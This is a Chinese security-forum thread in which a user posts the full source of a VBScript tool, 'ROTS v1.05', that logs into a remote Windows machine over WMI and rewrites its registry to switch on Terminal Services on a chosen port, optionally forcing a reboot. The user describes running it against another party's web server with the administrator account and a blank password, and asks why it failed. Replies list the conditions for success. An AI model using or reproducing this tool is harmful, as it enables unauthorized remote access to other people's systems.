|
作者: -- [iwbah_hz] 论坛用户 | 登录 |
on error resume next set outstreem=wscript.stdout set instreem=wscript.stdin if (lcase(right(wscript.fullname,11))="wscript.exe") then set objShell=wscript.createObject("wscript.shell") objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34)) wscript.quit end if if wscript.arguments.count<3 then usage() wscript.echo "Not enough parameters." wscript.quit end if ipaddress=wscript.arguments(0) username=wscript.arguments(1) password=wscript.arguments(2) if wscript.arguments.count>3 then port=wscript.arguments(3) else port=3389 end if if not isnumeric(port) or port<1 or port>65000 then wscript.echo "The number of port is error." wscript.quit end if if wscript.arguments.count>4 then reboot=wscript.arguments(4) else reboot="" end if usage() outstreem.write "Conneting "&ipaddress&" ...." set objlocator=createobject("wbemscripting.swbemlocator") set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password) showerror(err.number) objswbemservices.security_.privileges.add 23,true objswbemservices.security_.privileges.add 18,true outstreem.write "Checking OS type...." set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem") for each objinstoscaption in colinstoscaption if instr(objinstoscaption.caption,"Server")>0 then wscript.echo "OK!" else wscript.echo "OS type is "&objinstoscaption.caption outstreem.write "Do you want to cancel setup?[y/n]" strcancel=instreem.readline if lcase(strcancel)<>"n" then wscript.quit end if next outstreem.write "Writing into registry ...." set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov") HKLM=&h80000002 HKU=&h80000003 with objinstreg .createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache" .setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0 .createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer" .setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1 .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1 .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2 .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2 .setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1" .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port end with showerror(err.number) rebt=lcase(reboot) flag=0 if rebt="/r" or rebt="-r" or rebt="\r" then flag=2 if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6 if flag<>0 then outstreem.write "Now, reboot target...." strwqlquery="select * from win32_operatingsystem where primary='true'" set colinstances=objswbemservices.execquery(strwqlquery) for each objinstance in colinstances objinstance.win32shutdown(flag) next showerror(err.number) else wscript.echo "You need to reboot target."&vbcrlf&"Then," end if wscript.echo "You can logon terminal services on "&port&" later. Good luck!" function showerror(errornumber) if errornumber Then wscript.echo "Error 0x"&cstr(hex(err.number))&" ." if err.description <> "" then wscript.echo "Error description: "&err.description&"." end if wscript.quit else wscript.echo "OK!" end if end function function usage() wscript.echo string(79,"*") wscript.echo "ROTS v1.05" wscript.echo "Remote Open Terminal services Script, by zzzEVAzzz" wscript.echo "Welcome to visite www.isgrey.com" wscript.echo "Usage:" wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]" wscript.echo "port: default number is 3389." wscript.echo "/r: auto reboot target." wscript.echo "/fr: auto force reboot target." wscript.echo string(79,"*")&vbcrlf end function 我把这段代码保存为3389.vbe后 cscripts 3389.vbe ip administrator "" 3389 /fr 返回结果是成功! 可是我没有看到对方机器重启呀?而且不能登陆。 用nmap扫描了,它也没有开3389端口呀? 请问是怎么回事那? 有人说对方可能是2kpro的,不是server,对方是个www服务器,怎么样判断对方是server或是pro的那? |
地主 发表时间: 05/27 10:51 |
回复: haltmonk [haltmonk] 论坛用户 | 登录 |
ft,有cgi漏洞并非都会成功的。 不会这么容易的哈。 |
B1层 发表时间: 05/27 13:21 |
回复: -- [iwbah_hz] 论坛用户 | 登录 |
我什么时候说有cgi漏洞了? 我要开的是终端服务? 而且要问的是2kpro和server怎么分? |
B2层 发表时间: 05/27 13:44 |
回复: ma2751_cn [ma2751_cn] | 登录 |
精华区有完整代码!!! 成功的条件: 1 对方是windows 2000 server 2 你要有username and password!! |
B3层 发表时间: 05/27 18:33 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号